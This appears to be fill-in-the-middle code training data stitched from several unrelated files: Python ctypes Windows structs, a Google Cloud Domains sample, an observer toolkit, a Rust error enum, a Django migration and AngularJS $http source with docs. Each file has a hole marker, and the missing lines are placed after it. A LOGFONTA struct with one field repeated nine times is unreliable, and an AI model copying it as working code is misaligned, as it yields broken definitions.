alignment(NMTTDISPINFOW) else: assert sizeof(NMTTDISPINFOW) == 188, sizeof(NMTTDISPINFOW) assert alignment(NMTTDISPINFOW) == 4, alignment(NMTTDISPINFOW) # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 2208 class WINDOWPLACEMENT(Structure): _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/winuser.h 2208 ('length', UINT), ('flags', UINT), ('showCmd', UINT), ('ptMinPosition', POINT), ('ptMaxPosition', POINT), ('rcNormalPosition', RECT), ] assert sizeof(WINDOWPLACEMENT) == 44, sizeof(WINDOWPLACEMENT) assert alignment(WINDOWPLACEMENT) == 4, alignment(WINDOWPLACEMENT) # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4052 class TVHITTESTINFO(Structure): #_pack_ = 1 _fields_ = [ # C:/PROGRA~1/MICROS~4/VC98/Include/commctrl.h 4052 ('pt', POINT), ('flags', UINT), ('hItem', HTREEITEM), ] if is_x64(): assert sizeof(TVHITTESTINFO) == 24, sizeof(TVHITTESTINFO) assert alignment(TVHITTESTINFO) == 8, alignment(TVHITTESTINFO) else: assert sizeof(TVHITTESTINFO) == 16, sizeof(TVHITTESTINFO) assert alignment(TVHITTESTINFO) == 4, alignment(TVHITTESTINFO) class LOGFONTA(Structure): _fields_ = [ ('lfHeight', LONG), ('lfHeight', LONG), ('lfHeight', LONG), ('lfHeight', LONG), ('lfHeight', LONG), ('lfHeight', LONG), ('lfHeight', LONG), ('lfHeight', LONG), ('lfHeight', LONG) ] class GV_ITEM(Structure): _pack_ = 1 _fields_ = [ ('row', c_int), ('col', c_int), ('mask', UINT), ('state', UINT), ('nFormat', UINT) ] #assert sizeof(LVITEMW) == 40, sizeof(LVITEMW) #assert alignment(LVITEMW) == 1, alignment(LVITEMW)<|fim▁end|>
assert sizeof(NMHDR) == 12, sizeof(NMHDR) assert alignment(NMHDR) == 4, alignment(NMHDR)
<|file_name|>domains_v1_generated_domains_delete_registration_sync.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Generated code. DO NOT EDIT! # # Snippet for DeleteRegistration # NOTE: This snippet has been automatically generated for illustrative purposes only. # It may require modifications to work in your environment. # To install the latest published package dependency, execute the following: # python3 -m pip install google-cloud-domains # [START domains_v1_generated_Domains_DeleteRegistration_sync] from google.cloud import domains_v1 def sample_delete_registration(): # Create a client client = domains_v1.DomainsClient() # Initialize request argument(s) request = domains_v1.DeleteRegistrationRequest( name="name_value", ) # Make the request operation = client.delete_registration(request=request) <|fim▁hole|> response = operation.result() # Handle the response print(response) # [END domains_v1_generated_Domains_DeleteRegistration_sync]<|fim▁end|>
print("Waiting for operation to complete...")
<|file_name|>toolkit.py<|end_file_name|><|fim▁begin|>from abc import abstractmethod from threading import Timer from ctx.uncertainty.measurers import clear_dobson_paddy class Event: def __init__(self, type, **kwargs): self.type = type self.properties = kwargs class Observer: def update(self): raise NotImplementedError("Not implemented") class Observable: def __init__(self): self._observers = [] def register(self, observer): self._observers.append(observer) def notify(self, event): event.source = self for observer in self._observers: observer.update(event) class Widget(Observable, Observer): @abstractmethod def update(self, event): pass def __init__(self, type, status_name, *generators): super(Widget, self).__init__() self.type = type self.generators = generators self.status = None self.status_name = status_name for generator in generators: generator.register(self) def get_property(self, type): for generator in self.generators: if generator.type == type: return generator.property class Generator(Observable): def __init__(self, type, relevance, threshold, certainty_measurer=clear_dobson_paddy): super().__init__() self.certainty_measurer = certainty_measurer self.property = None self.type = type self.relevance = relevance self.threshold = threshold def generate(self): # generate a dict, e.g.: {"value": 12, "certainty" : 0.9} raise NotImplementedError("Not implemented") <|fim▁hole|> return is_acceptable def start(self, delay=5): new_property = self.generate() if new_property['value'] != self.property and self.has_acceptable_certainty(new_property): self.property = new_property['value'] event = Event(self.type, property=new_property['value']) super().notify(event) timer_task = Timer(delay, lambda: self.start(delay), ()) timer_task.start()<|fim▁end|>
def has_acceptable_certainty(self, new_property): certainty_level = self.certainty_measurer(self.relevance, new_property['accuracy']) is_acceptable = certainty_level > self.threshold
<|file_name|>error.rs<|end_file_name|><|fim▁begin|>use std::io; use thiserror::Error; #[derive(Debug, Error)] pub enum RequestError { #[error("failed to parse request")] Parse { #[from] source: serde_json::Error, }, #[error("IO error")] IO { #[from] source: io::Error, },<|fim▁hole|>} #[derive(Debug, Error)] pub enum ParseArgsError { #[error("expected type argument, one of 'local'")] TypeMissing, #[error("path argument missing")] PathMissing, }<|fim▁end|>
#[error("Failed to get stdin")] Stdin,
<|file_name|>0019_auto_20181005_1645.py<|end_file_name|><|fim▁begin|># Generated by Django 2.0.8 on 2018-10-05 19:45 from django.db import migrations from django.core.exceptions import ObjectDoesNotExist def cria_sistema_cultura(apps, schema_editor): erros = [] SistemaCultura = apps.get_model('adesao', 'SistemaCultura') Municipio = apps.get_model('adesao', 'Municipio') Cidade = apps.get_model('adesao', 'Cidade') EnteFederado = apps.get_model('adesao', 'EnteFederado') Secretario = apps.get_model('adesao', 'Secretario') Funcionario = apps.get_model('adesao', 'Funcionario') Gestor = apps.get_model('adesao', 'Gestor') Sede = apps.get_model('adesao', 'Sede') Diligencia = apps.get_model('gestao', 'Diligencia') DiligenciaSimples = apps.get_model('gestao', 'DiligenciaSimples') Componente = apps.get_model('planotrabalho', 'Componente') for municipio in Municipio.objects.all(): sistema_cultura = SistemaCultura() sistema_cultura.gestor = Gestor.objects.create( cpf=municipio.cpf_prefeito, rg=municipio.rg_prefeito, orgao_expeditor_rg=municipio.orgao_expeditor_rg, estado_expeditor=municipio.estado_expeditor, nome=municipio.nome_prefeito, telefone_um=municipio.telefone_um, telefone_dois=municipio.telefone_dois, telefone_tres=municipio.telefone_tres, email_institucional=municipio.email_institucional_prefeito, tipo_funcionario=3, termo_posse=municipio.termo_posse_prefeito, rg_copia=municipio.rg_copia_prefeito, cpf_copia=municipio.cpf_copia_prefeito ) sistema_cultura.sede = Sede.objects.create( localizacao=municipio.localizacao, cnpj=municipio.cnpj_prefeitura, endereco=municipio.endereco, complemento=municipio.complemento, cep=municipio.cep, bairro=municipio.bairro, telefone_um=municipio.telefone_um, telefone_dois=municipio.telefone_dois, telefone_tres=municipio.telefone_tres, endereco_eletronico=municipio.endereco_eletronico ) if municipio.cidade is None: try: sistema_cultura.ente_federado = EnteFederado.objects.get(cod_ibge=municipio.estado.codigo_ibge) except EnteFederado.DoesNotExist: ente = EnteFederado.objects.filter(nome__icontains=municipio.estado.nome_uf) if not ente or len(ente) > 1: print(f"Erro ao procurar UF {municipio.estado.nome_uf} - {municipio.estado.codigo_ibge}\n") erros.append(municipio.estado.codigo_ibge) pass sistema_cultura.ente_federado = ente[0] else: try: cidade = Cidade.objects.get(nome_municipio=municipio.cidade.nome_municipio, uf=municipio.estado) sistema_cultura.ente_federado = EnteFederado.objects.get(cod_ibge=cidade.codigo_ibge) except EnteFederado.DoesNotExist: ente = EnteFederado.objects.filter(cod_ibge__startswith=cidade.codigo_ibge) if not ente or len(ente) > 1: print(f"Erro ao procurar Municipio {municipio.cidade.nome_municipio} - {municipio.cidade.codigo_ibge}\n") erros.append(municipio.estado.codigo_ibge) pass sistema_cultura.ente_federado = ente[0] componentes_antigos = ('criacao_sistema', 'orgao_gestor', 'conselho_cultural', 'plano_cultura') componente_type = ('36', '37', '38', '40') componentes_novos = ('legislacao', 'orgao_gestor', 'conselho', 'plano') sistema_cultura.numero_processo = municipio.numero_processo try: sistema_cultura.cadastrador = municipio.usuario sistema_cultura.estado_processo = municipio.usuario.estado_processo sistema_cultura.data_publicacao_acordo = municipio.usuario.data_publicacao_acordo sistema_cultura.link_publicacao_acordo = municipio.usuario.link_publicacao_acordo sistema_cultura.processo_sei = municipio.usuario.processo_sei if municipio.usuario.plano_trabalho: diligencia = Diligencia.objects.filter( componente_id=municipio.usuario.plano_trabalho.id, componente_type_id=35).order_by('-data_criacao').first() <|fim▁hole|> texto_diligencia=diligencia.texto_diligencia, classificacao_arquivo=diligencia.classificacao_arquivo, usuario=diligencia.usuario) sistema_cultura.diligencia.save() for nome_componente_antigo, nome_componente_novo, tipo_componente in zip(componentes_antigos, componentes_novos, componente_type): if municipio.usuario.plano_trabalho: componente_antigo = getattr(municipio.usuario.plano_trabalho, nome_componente_antigo) if componente_antigo: setattr(sistema_cultura, nome_componente_novo, Componente.objects.create()) componente_novo = getattr(sistema_cultura, nome_componente_novo) componente_novo.tipo = componentes_novos.index(nome_componente_novo) componente_novo.arquivo = componente_antigo.arquivo componente_novo.situacao = componente_antigo.situacao.id componente_novo.data_envio = componente_antigo.data_envio componente_novo.data_publicacao = componente_antigo.data_publicacao diligencia = Diligencia.objects.filter( componente_id=componente_antigo.id, componente_type_id=tipo_componente).order_by('-data_criacao').first() if diligencia: componente_novo.diligencia = DiligenciaSimples.objects.create( texto_diligencia=diligencia.texto_diligencia, classificacao_arquivo=diligencia.classificacao_arquivo, usuario=diligencia.usuario) componente_novo.save() secretario = municipio.usuario.secretario if secretario: sistema_cultura.secretario = Funcionario.objects.create(cpf=secretario.cpf_secretario, rg=secretario.rg_secretario, orgao_expeditor_rg=secretario.orgao_expeditor_rg, estado_expeditor=secretario.estado_expeditor, nome=secretario.nome_secretario, cargo=secretario.cargo_secretario, instituicao=secretario.instituicao_secretario, telefone_um=secretario.telefone_um, telefone_dois=secretario.telefone_dois, telefone_tres=secretario.telefone_tres, email_institucional=secretario.email_institucional_secretario, tipo_funcionario=0) responsavel = municipio.usuario.responsavel if responsavel: sistema_cultura.responsavel = Funcionario.objects.create(cpf=responsavel.cpf_responsavel, rg=responsavel.rg_responsavel, orgao_expeditor_rg=responsavel.orgao_expeditor_rg, estado_expeditor=responsavel.estado_expeditor, nome=responsavel.nome_responsavel, cargo=responsavel.cargo_responsavel, instituicao=responsavel.instituicao_responsavel, telefone_um=responsavel.telefone_um, telefone_dois=responsavel.telefone_dois, telefone_tres=responsavel.telefone_tres, email_institucional=responsavel.email_institucional_responsavel, tipo_funcionario=1) except ObjectDoesNotExist: sistema_cultura.estado_processo = 6 sistema_cultura.save() class Migration(migrations.Migration): dependencies = [ ('planotrabalho', '0008_componente_data_publicacao'), ('gestao', '0006_remove_diligenciasimples_tipo_diligencia'), ('adesao', '0020_auto_20181008_1610'), ] operations = [ migrations.RunPython(cria_sistema_cultura), ]<|fim▁end|>
if diligencia: sistema_cultura.diligencia = DiligenciaSimples.objects.create(
<|file_name|>http.js<|end_file_name|><|fim▁begin|>'use strict'; var APPLICATION_JSON = 'application/json'; var CONTENT_TYPE_APPLICATION_JSON = {'Content-Type': APPLICATION_JSON + ';charset=utf-8'}; var JSON_START = /^\[|^\{(?!\{)/; var JSON_ENDS = { '[': /]$/, '{': /}$/ }; var JSON_PROTECTION_PREFIX = /^\)\]\}',?\n/; var $httpMinErr = minErr('$http'); var $httpMinErrLegacyFn = function(method) { return function() { throw $httpMinErr('legacy', 'The method `{0}` on the promise returned from `$http` has been disabled.', method); }; }; function serializeValue(v) { if (isObject(v)) { return isDate(v) ? v.toISOString() : toJson(v); } return v; } function $HttpParamSerializerProvider() { /** * @ngdoc service * @name $httpParamSerializer * @description * * Default {@link $http `$http`} params serializer that converts objects to strings * according to the following rules: * * * `{'foo': 'bar'}` results in `foo=bar` * * `{'foo': Date.now()}` results in `foo=2015-04-01T09%3A50%3A49.262Z` (`toISOString()` and encoded representation of a Date object) * * `{'foo': ['bar', 'baz']}` results in `foo=bar&foo=baz` (repeated key for each array element) * * `{'foo': {'bar':'baz'}}` results in `foo=%7B%22bar%22%3A%22baz%22%7D"` (stringified and encoded representation of an object) * * Note that serializer will sort the request parameters alphabetically. * */ this.$get = function() { return function ngParamSerializer(params) { if (!params) return ''; var parts = []; forEachSorted(params, function(value, key) { if (value === null || isUndefined(value)) return; if (isArray(value)) { forEach(value, function(v, k) { parts.push(encodeUriQuery(key) + '=' + encodeUriQuery(serializeValue(v))); }); } else { parts.push(encodeUriQuery(key) + '=' + encodeUriQuery(serializeValue(value))); } }); return parts.join('&'); }; }; } function $HttpParamSerializerJQLikeProvider() { /** * @ngdoc service * @name $httpParamSerializerJQLike * @description * * Alternative {@link $http `$http`} params serializer that follows * jQuery's [`param()`](http://api.jquery.com/jquery.param/) method logic. * The serializer will also sort the params alphabetically. * * To use it for serializing `$http` request parameters, set it as the `paramSerializer` property: * * ```js * $http({ * url: myUrl, * method: 'GET', * params: myParams, * paramSerializer: '$httpParamSerializerJQLike' * }); * ``` * * It is also possible to set it as the default `paramSerializer` in the * {@link $httpProvider#defaults `$httpProvider`}. * * Additionally, you can inject the serializer and use it explicitly, for example to serialize * form data for submission: * * ```js * .controller(function($http, $httpParamSerializerJQLike) { * //... * * $http({ * url: myUrl, * method: 'POST', * data: $httpParamSerializerJQLike(myData), * headers: { * 'Content-Type': 'application/x-www-form-urlencoded' * } * }); * * }); * ``` * * */ this.$get = function() { return function jQueryLikeParamSerializer(params) { if (!params) return ''; var parts = []; serialize(params, '', true); return parts.join('&'); function serialize(toSerialize, prefix, topLevel) { if (toSerialize === null || isUndefined(toSerialize)) return; if (isArray(toSerialize)) { forEach(toSerialize, function(value, index) { serialize(value, prefix + '[' + (isObject(value) ? index : '') + ']'); }); } else if (isObject(toSerialize) && !isDate(toSerialize)) { forEachSorted(toSerialize, function(value, key) { serialize(value, prefix + (topLevel ? '' : '[') + key + (topLevel ? '' : ']')); }); } else { parts.push(encodeUriQuery(prefix) + '=' + encodeUriQuery(serializeValue(toSerialize))); } } }; }; } function defaultHttpResponseTransform(data, headers) { if (isString(data)) { // Strip json vulnerability protection prefix and trim whitespace var tempData = data.replace(JSON_PROTECTION_PREFIX, '').trim(); if (tempData) { var contentType = headers('Content-Type'); if ((contentType && (contentType.indexOf(APPLICATION_JSON) === 0)) || isJsonLike(tempData)) { data = fromJson(tempData); } } } return data; } function isJsonLike(str) { var jsonStart = str.match(JSON_START); return jsonStart && JSON_ENDS[jsonStart[0]].test(str); } /** * Parse headers into key value object * * @param {string} headers Raw headers as a string * @returns {Object} Parsed headers as key value object */ function parseHeaders(headers) { var parsed = createMap(), i; function fillInParsed(key, val) { if (key) { parsed[key] = parsed[key] ? parsed[key] + ', ' + val : val; } } if (isString(headers)) { forEach(headers.split('\n'), function(line) { i = line.indexOf(':'); fillInParsed(lowercase(trim(line.substr(0, i))), trim(line.substr(i + 1))); }); } else if (isObject(headers)) { forEach(headers, function(headerVal, headerKey) { fillInParsed(lowercase(headerKey), trim(headerVal)); }); } return parsed; } /** * Returns a function that provides access to parsed headers. * * Headers are lazy parsed when first requested. * @see parseHeaders * * @param {(string|Object)} headers Headers to provide access to. * @returns {function(string=)} Returns a getter function which if called with: * * - if called with single an argument returns a single header value or null * - if called with no arguments returns an object containing all headers. */ function headersGetter(headers) { var headersObj; return function(name) { if (!headersObj) headersObj = parseHeaders(headers); if (name) { var value = headersObj[lowercase(name)]; if (value === void 0) { value = null; } return value; } return headersObj; }; } /** * Chain all given functions * * This function is used for both request and response transforming * * @param {*} data Data to transform. * @param {function(string=)} headers HTTP headers getter fn. * @param {number} status HTTP status code of the response. * @param {(Function|Array.<Function>)} fns Function or an array of functions. * @returns {*} Transformed data. */ function transformData(data, headers, status, fns) { if (isFunction(fns)) { return fns(data, headers, status); } forEach(fns, function(fn) { data = fn(data, headers, status); }); return data; } function isSuccess(status) { return 200 <= status && status < 300; } /** * @ngdoc provider * @name $httpProvider * @description * Use `$httpProvider` to change the default behavior of the {@link ng.$http $http} service. * */ function $HttpProvider() { /** * @ngdoc property * @name $httpProvider#defaults * @description * * Object containing default values for all {@link ng.$http $http} requests. * * - **`defaults.cache`** - {Object} - an object built with {@link ng.$cacheFactory `$cacheFactory`} * that will provide the cache for all requests who set their `cache` property to `true`. * If you set the `defaults.cache = false` then only requests that specify their own custom * cache object will be cached. See {@link $http#caching $http Caching} for more information. * * - **`defaults.xsrfCookieName`** - {string} - Name of cookie containing the XSRF token. * Defaults value is `'XSRF-TOKEN'`. * * - **`defaults.xsrfHeaderName`** - {string} - Name of HTTP header to populate with the * XSRF token. Defaults value is `'X-XSRF-TOKEN'`. * * - **`defaults.headers`** - {Object} - Default headers for all $http requests. * Refer to {@link ng.$http#setting-http-headers $http} for documentation on * setting default headers. * - **`defaults.headers.common`** * - **`defaults.headers.post`** * - **`defaults.headers.put`** * - **`defaults.headers.patch`** * * * - **`defaults.paramSerializer`** - `{string|function(Object<string,string>):string}` - A function * used to the prepare string representation of request parameters (specified as an object). * If specified as string, it is interpreted as a function registered with the {@link auto.$injector $injector}. * Defaults to {@link ng.$httpParamSerializer $httpParamSerializer}. * **/ var defaults = this.defaults = { // transform incoming response data transformResponse: [defaultHttpResponseTransform], // transform outgoing request data transformRequest: [function(d) { return isObject(d) && !isFile(d) && !isBlob(d) && !isFormData(d) ? toJson(d) : d; }], // default headers headers: { common: { 'Accept': 'application/json, text/plain, */*' }, post: shallowCopy(CONTENT_TYPE_APPLICATION_JSON), put: shallowCopy(CONTENT_TYPE_APPLICATION_JSON), patch: shallowCopy(CONTENT_TYPE_APPLICATION_JSON) }, xsrfCookieName: 'XSRF-TOKEN', xsrfHeaderName: 'X-XSRF-TOKEN', paramSerializer: '$httpParamSerializer' }; var useApplyAsync = false; /** * @ngdoc method * @name $httpProvider#useApplyAsync * @description * * Configure $http service to combine processing of multiple http responses received at around * the same time via {@link ng.$rootScope.Scope#$applyAsync $rootScope.$applyAsync}. This can result in * significant performance improvement for bigger applications that make many HTTP requests * concurrently (common during application bootstrap). * * Defaults to false. If no value is specified, returns the current configured value. * * @param {boolean=} value If true, when requests are loaded, they will schedule a deferred * "apply" on the next tick, giving time for subsequent requests in a roughly ~10ms window * to load and share the same digest cycle. * * @returns {boolean|Object} If a value is specified, returns the $httpProvider for chaining. * otherwise, returns the current configured value. **/ this.useApplyAsync = function(value) { if (isDefined(value)) { useApplyAsync = !!value; return this; } return useApplyAsync; }; var useLegacyPromise = true; /** * @ngdoc method * @name $httpProvider#useLegacyPromiseExtensions * @description * * Configure `$http` service to return promises without the shorthand methods `success` and `error`. * This should be used to make sure that applications work without these methods. * * Defaults to true. If no value is specified, returns the current configured value. * * @param {boolean=} value If true, `$http` will return a promise with the deprecated legacy `success` and `error` methods. * * @returns {boolean|Object} If a value is specified, returns the $httpProvider for chaining. * otherwise, returns the current configured value. **/ this.useLegacyPromiseExtensions = function(value) { if (isDefined(value)) { useLegacyPromise = !!value; return this; } return useLegacyPromise; }; /** * @ngdoc property * @name $httpProvider#interceptors * @description * * Array containing service factories for all synchronous or asynchronous {@link ng.$http $http} * pre-processing of request or postprocessing of responses. * * These service factories are ordered by request, i.e. they are applied in the same order as the * array, on request, but reverse order, on response. * * {@link ng.$http#interceptors Interceptors detailed info} **/ var interceptorFactories = this.interceptors = []; this.$get = ['$httpBackend', '$$cookieReader', '$cacheFactory', '$rootScope', '$q', '$injector', function($httpBackend, $$cookieReader, $cacheFactory, $rootScope, $q, $injector) { var defaultCache = $cacheFactory('$http'); /** * Make sure that default param serializer is exposed as a function */ defaults.paramSerializer = isString(defaults.paramSerializer) ? $injector.get(defaults.paramSerializer) : defaults.paramSerializer; /** * Interceptors stored in reverse order. Inner interceptors before outer interceptors. * The reversal is needed so that we can build up the interception chain around the * server request. */ var reversedInterceptors = []; forEach(interceptorFactories, function(interceptorFactory) { reversedInterceptors.unshift(isString(interceptorFactory) ? $injector.get(interceptorFactory) : $injector.invoke(interceptorFactory)); }); /** * @ngdoc service * @kind function * @name $http * @requires ng.$httpBackend * @requires $cacheFactory * @requires $rootScope * @requires $q * @requires $injector * * @description * The `$http` service is a core Angular service that facilitates communication with the remote * HTTP servers via the browser's [XMLHttpRequest](https://developer.mozilla.org/en/xmlhttprequest) * object or via [JSONP](http://en.wikipedia.org/wiki/JSONP). * * For unit testing applications that use `$http` service, see * {@link ngMock.$httpBackend $httpBackend mock}. * * For a higher level of abstraction, please check out the {@link ngResource.$resource * $resource} service. * * The $http API is based on the {@link ng.$q deferred/promise APIs} exposed by * the $q service. While for simple usage patterns this doesn't matter much, for advanced usage * it is important to familiarize yourself with these APIs and the guarantees they provide. * * * ## General usage * The `$http` service is a function which takes a single argument — a {@link $http#usage configuration object} — * that is used to generate an HTTP request and returns a {@link ng.$q promise}. * * ```js * // Simple GET request example: * $http({ * method: 'GET', * url: '/someUrl' * }).then(function successCallback(response) { * // this callback will be called asynchronously * // when the response is available * }, function errorCallback(response) { * // called asynchronously if an error occurs * // or server returns response with an error status. * }); * ``` * * The response object has these properties: * * - **data** – `{string|Object}` – The response body transformed with the transform * functions. * - **status** – `{number}` – HTTP status code of the response. * - **headers** – `{function([headerName])}` – Header getter function. * - **config** – `{Object}` – The configuration object that was used to generate the request. * - **statusText** – `{string}` – HTTP status text of the response. * * A response status code between 200 and 299 is considered a success status and * will result in the success callback being called. Note that if the response is a redirect, * XMLHttpRequest will transparently follow it, meaning that the error callback will not be * called for such responses. * * * ## Shortcut methods * * Shortcut methods are also available. All shortcut methods require passing in the URL, and * request data must be passed in for POST/PUT requests. An optional config can be passed as the * last argument. * * ```js * $http.get('/someUrl', config).then(successCallback, errorCallback); * $http.post('/someUrl', data, config).then(successCallback, errorCallback); * ``` * * Complete list of shortcut methods: * * - {@link ng.$http#get $http.get} * - {@link ng.$http#head $http.head} * - {@link ng.$http#post $http.post} * - {@link ng.$http#put $http.put} * - {@link ng.$http#delete $http.delete} * - {@link ng.$http#jsonp $http.jsonp} * - {@link ng.$http#patch $http.patch} * * * ## Writing Unit Tests that use $http * When unit testing (using {@link ngMock ngMock}), it is necessary to call * {@link ngMock.$httpBackend#flush $httpBackend.flush()} to flush each pending * request using trained responses. * * ``` * $httpBackend.expectGET(...); * $http.get(...); * $httpBackend.flush(); * ``` * * ## Deprecation Notice * <div class="alert alert-danger"> * The `$http` legacy promise methods `success` and `error` have been deprecated. * Use the standard `then` method instead. * If {@link $httpProvider#useLegacyPromiseExtensions `$httpProvider.useLegacyPromiseExtensions`} is set to * `false` then these methods will throw {@link $http:legacy `$http/legacy`} error. * </div> * * ## Setting HTTP Headers * * The $http service will automatically add certain HTTP headers to all requests. These defaults * can be fully configured by accessing the `$httpProvider.defaults.headers` configuration * object, which currently contains this default configuration: * * - `$httpProvider.defaults.headers.common` (headers that are common for all requests): * - `Accept: application/json, text/plain, * / *` * - `$httpProvider.defaults.headers.post`: (header defaults for POST requests) * - `Content-Type: application/json` * - `$httpProvider.defaults.headers.put` (header defaults for PUT requests) * - `Content-Type: application/json` * * To add or overwrite these defaults, simply add or remove a property from these configuration * objects. To add headers for an HTTP method other than POST or PUT, simply add a new object * with the lowercased HTTP method name as the key, e.g. * `$httpProvider.defaults.headers.get = { 'My-Header' : 'value' }`. * * The defaults can also be set at runtime via the `$http.defaults` object in the same * fashion. For example: * * ``` * module.run(function($http) { * $http.defaults.headers.common.Authorization = 'Basic YmVlcDpib29w' * }); * ``` * * In addition, you can supply a `headers` property in the config object passed when * calling `$http(config)`, which overrides the defaults without changing them globally. * * To explicitly remove a header automatically added via $httpProvider.defaults.headers on a per request basis, * Use the `headers` property, setting the desired header to `undefined`. For example: * * ```js * var req = { * method: 'POST', * url: 'http://example.com', * headers: { * 'Content-Type': undefined * }, * data: { test: 'test' } * } * * $http(req).then(function(){...}, function(){...}); * ``` * * ## Transforming Requests and Responses * * Both requests and responses can be transformed using transformation functions: `transformRequest` * and `transformResponse`. These properties can be a single function that returns * the transformed value (`function(data, headersGetter, status)`) or an array of such transformation functions, * which allows you to `push` or `unshift` a new transformation function into the transformation chain. * * ### Default Transformations * * The `$httpProvider` provider and `$http` service expose `defaults.transformRequest` and<|fim▁hole|> * `defaults.transformResponse` properties. If a request does not provide its own transformations * then these will be applied. * * You can augment or replace the default transformations by modifying these properties by adding to or * replacing the array. * * Angular provides the following default transformations: * * Request transformations (`$httpProvider.defaults.transformRequest` and `$http.defaults.transformRequest`): * * - If the `data` property of the request configuration object contains an object, serialize it * into JSON format. * * Response transformations (`$httpProvider.defaults.transformResponse` and `$http.defaults.transformResponse`): * * - If XSRF prefix is detected, strip it (see Security Considerations section below). * - If JSON response is detected, deserialize it using a JSON parser. * * * ### Overriding the Default Transformations Per Request * * If you wish override the request/response transformations only for a single request then provide * `transformRequest` and/or `transformResponse` properties on the configuration object passed * into `$http`. * * Note that if you provide these properties on the config object the default transformations will be * overwritten. If you wish to augment the default transformations then you must include them in your * local transformation array. * * The following code demonstrates adding a new response transformation to be run after the default response * transformations have been run. * * ```js * function appendTransform(defaults, transform) { * * // We can't guarantee that the default transformation is an array * defaults = angular.isArray(defaults) ? defaults : [defaults]; * * // Append the new transformation to the defaults * return defaults.concat(transform); * } * * $http({ * url: '...', * method: 'GET', * transformResponse: appendTransform($http.defaults.transformResponse, function(value) { * return doTransform(value); * }) * }); * ``` * * * ## Caching * * To enable caching, set the request configuration `cache` property to `true` (to use default * cache) or to a custom cache object (built with {@link ng.$cacheFactory `$cacheFactory`}). * When the cache is enabled, `$http` stores the response from the server in the specified * cache. The next time the same request is made, the response is served from the cache without * sending a request to the server. * * Note that even if the response is served from cache, delivery of the data is asynchronous in * the same way that real requests are. * * If there are multiple GET requests for the same URL that should be cached using the same * cache, but the cache is not populated yet, only one request to the server will be made and * the remaining requests will be fulfilled using the response from the first request. * * You can change the default cache to a new object (built with * {@link ng.$cacheFactory `$cacheFactory`}) by updating the * {@link ng.$http#defaults `$http.defaults.cache`} property. All requests who set * their `cache` property to `true` will now use this cache object. * * If you set the default cache to `false` then only requests that specify their own custom * cache object will be cached. * * ## Interceptors * * Before you start creating interceptors, be sure to understand the * {@link ng.$q $q and deferred/promise APIs}. * * For purposes of global error handling, authentication, or any kind of synchronous or * asynchronous pre-processing of request or postprocessing of responses, it is desirable to be * able to intercept requests before they are handed to the server and * responses before they are handed over to the application code that * initiated these requests. The interceptors leverage the {@link ng.$q * promise APIs} to fulfill this need for both synchronous and asynchronous pre-processing. * * The interceptors are service factories that are registered with the `$httpProvider` by * adding them to the `$httpProvider.interceptors` array. The factory is called and * injected with dependencies (if specified) and returns the interceptor. * * There are two kinds of interceptors (and two kinds of rejection interceptors): * * * `request`: interceptors get called with a http {@link $http#usage config} object. The function is free to * modify the `config` object or create a new one. The function needs to return the `config` * object directly, or a promise containing the `config` or a new `config` object. * * `requestError`: interceptor gets called when a previous interceptor threw an error or * resolved with a rejection. * * `response`: interceptors get called with http `response` object. The function is free to * modify the `response` object or create a new one. The function needs to return the `response` * object directly, or as a promise containing the `response` or a new `response` object. * * `responseError`: interceptor gets called when a previous interceptor threw an error or * resolved with a rejection. * * * ```js * // register the interceptor as a service * $provide.factory('myHttpInterceptor', function($q, dependency1, dependency2) { * return { * // optional method * 'request': function(config) { * // do something on success * return config; * }, * * // optional method * 'requestError': function(rejection) { * // do something on error * if (canRecover(rejection)) { * return responseOrNewPromise * } * return $q.reject(rejection); * }, * * * * // optional method * 'response': function(response) { * // do something on success * return response; * }, * * // optional method * 'responseError': function(rejection) { * // do something on error * if (canRecover(rejection)) { * return responseOrNewPromise * } * return $q.reject(rejection); * } * }; * }); * * $httpProvider.interceptors.push('myHttpInterceptor'); * * * // alternatively, register the interceptor via an anonymous factory * $httpProvider.interceptors.push(function($q, dependency1, dependency2) { * return { * 'request': function(config) { * // same as above * }, * * 'response': function(response) { * // same as above * } * }; * }); * ``` * * ## Security Considerations * * When designing web applications, consider security threats from: * * - [JSON vulnerability](http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx) * - [XSRF](http://en.wikipedia.org/wiki/Cross-site_request_forgery) * * Both server and the client must cooperate in order to eliminate these threats. Angular comes * pre-configured with strategies that address these issues, but for this to work backend server * cooperation is required. * * ### JSON Vulnerability Protection * * A [JSON vulnerability](http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx) * allows third party website to turn your JSON resource URL into * [JSONP](http://en.wikipedia.org/wiki/JSONP) request under some conditions. To * counter this your server can prefix all JSON requests with following string `")]}',\n"`. * Angular will automatically strip the prefix before processing it as JSON. * * For example if your server needs to return: * ```js * ['one','two'] * ``` * * which is vulnerable to attack, your server can return: * ```js * )]}', * ['one','two'] * ``` * * Angular will strip the prefix, before processing the JSON. * * * ### Cross Site Request Forgery (XSRF) Protection * * [XSRF](http://en.wikipedia.org/wiki/Cross-site_request_forgery) is a technique by which * an unauthorized site can gain your user's private data. Angular provides a mechanism * to counter XSRF. When performing XHR requests, the $http service reads a token from a cookie * (by default, `XSRF-TOKEN`) and sets it as an HTTP header (`X-XSRF-TOKEN`). Since only * JavaScript that runs on your domain could read the cookie, your server can be assured that * the XHR came from JavaScript running on your domain. The header will not be set for * cross-domain requests. * * To take advantage of this, your server needs to set a token in a JavaScript readable session * cookie called `XSRF-TOKEN` on the first HTTP GET request. On subsequent XHR requests the * server can verify that the cookie matches `X-XSRF-TOKEN` HTTP header, and therefore be sure * that only JavaScript running on your domain could have sent the request. The token must be * unique for each user and must be verifiable by the server (to prevent the JavaScript from * making up its own tokens). We recommend that the token is a digest of your site's * authentication cookie with a [salt](https://en.wikipedia.org/wiki/Salt_(cryptography&#41;) * for added security. * * The name of the headers can be specified using the xsrfHeaderName and xsrfCookieName * properties of either $httpProvider.defaults at config-time, $http.defaults at run-time, * or the per-request config object. * * In order to prevent collisions in environments where multiple Angular apps share the * same domain or subdomain, we recommend that each application uses unique 